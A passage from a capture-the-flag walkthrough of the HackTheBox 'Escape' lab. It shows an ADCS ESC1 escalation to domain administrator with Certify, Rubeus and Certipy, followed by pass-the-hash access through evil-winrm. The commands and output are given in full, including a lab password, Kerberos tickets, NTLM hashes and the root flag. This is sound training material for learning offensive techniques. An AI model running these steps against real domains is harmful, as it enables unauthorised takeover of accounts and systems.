KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFFqswYrt9aCxpxEcaawU+xV3pkk/
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAHeC4ZJ9wx1f9rrF03eoILmsIIuRTrgsUc4WSi3CbQ7KaB/XCsKvWSaR0
evwozH27Nk4nvD3YXSTlAoF9UqGhF8rUacWbHWFu04yPS2DGNAHs/bKVSxKdC1xh
NEUjFYowe7NOMn+HdPOkxR8Dy3+xHLi0wZW5cEbo39xFljuGQiUu19a1q5gTzHJA
FmGXR30uCcVtb1pXi3gUj0Y2i25ZwDR7Gb7oE2kNST/QRPjx2l7aATnOElinDKOv
r2E5h25b/1ZXxFQF7dPL7m/39vAQEXKh9vK53Rr6Yt/rtY7so0HdEKY58vwbg3+S
Ns1arM4q6AuVLKS3Zpm0/XBW4AHPQQ==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:14.2586605

We will copy everything from -----BEGIN RSA PRIVATE KEY----- to -----END CERTIFICATE----- into a file on my host and convert it to a .pfx using the command given, entering no password when prompted:

└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

We will upload cert.pfx, as well as a copy of Rubeus (downloaded from SharpCollection), and then run the asktgt command, passing it the certificate to get a TGT as administrator:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload Rubeus.exe
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload cert.pfx

*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx 

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  10/12/2024 9:29:40 AM
  EndTime                  :  10/12/2024 7:29:40 PM
  RenewTill                :  10/19/2024 9:29:40 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  BKBLFIk+E1K8gzVRsHTH7A==
  ASREP (key)              :  85742085636725858D930F1414606557

It works! However, Rubeus tries to load the returned ticket directly into the current session, so in theory, once we run this we could just enter administrator’s folders and get the flag. However, this doesn’t work on Evil-WinRM.

Instead, we are going to run the same command with /getcredentials /show /nowrap. This will do the same thing, and try to dump credential information about the account:

*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx /getcredentials /show /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  10/12/2024 9:31:26 AM
  EndTime                  :  10/12/2024 7:31:26 PM
  RenewTill                :  10/19/2024 9:31:26 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  DIAHQIuZHSEZlbQBDkLc+A==
  ASREP (key)              :  110909A97E0152C6912DECA81DCFBE8F

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

The last line is the NTLM hash for the administrator account.

An alternative tool to accomplish the same thing is Certipy, which is nice because I can run it remotely from my VM. It has a find command that will identify the vulnerable template: (Install Certipy by running)

└─$ sudo apt install pipx
└─$ pipx install certipy-ad

└─$ certipy find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

And req allows us to get the .pfx certificate just like what we did with Certify.exe and openssl above:

└─$ certipy req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

The auth command will take that certificate (administrator.pfx) and get the hash.

└─$ certipy auth -pfx administrator.pfx 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

I noted above that there was an eight hour different in clock times. I can sync the clock with Escape using ntpdate:

└─$ sudo ntpdate -u sequel.htb
2024-10-12 12:43:01.268731 (-0400) +28800.405648 +/- 0.095215 sequel.htb 10.129.228.253 s1 no-leap
CLOCK: time stepped by 28800.405648

Now we can dump the hash:

└─$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

We can now connect to DC using Evil-WinRm using the NTLM hash of administrator:

└─$ evil-winrm -i 10.129.228.253 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator

We can get root.txt on Administrator’s Desktop

cat r*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
0bb099b417e05141ed88932a9a14c558
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : dc
   Primary Dns Suffix  . . . . . . . : sequel.htb
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : sequel.htb
                                       .htb

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
   Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
   Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 10:31:29 AM
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
                                       10.129.0.1
   DHCP Server . . . . . . . . . . . : 10.129.0.1
   DHCPv6 IAID . . . . . . . . . . . : 251678806
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
   DNS Servers . . . . . . . . . . . : 127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

References

https://0xdf.gitlab.io/2023/06/17/htb-escape.html
https://github.com/ly4k/Certipy
https://github.com/GhostPack/Certify
https://github.com/Flangvik/SharpCollection/tree/master/NetFramework_4.7_Any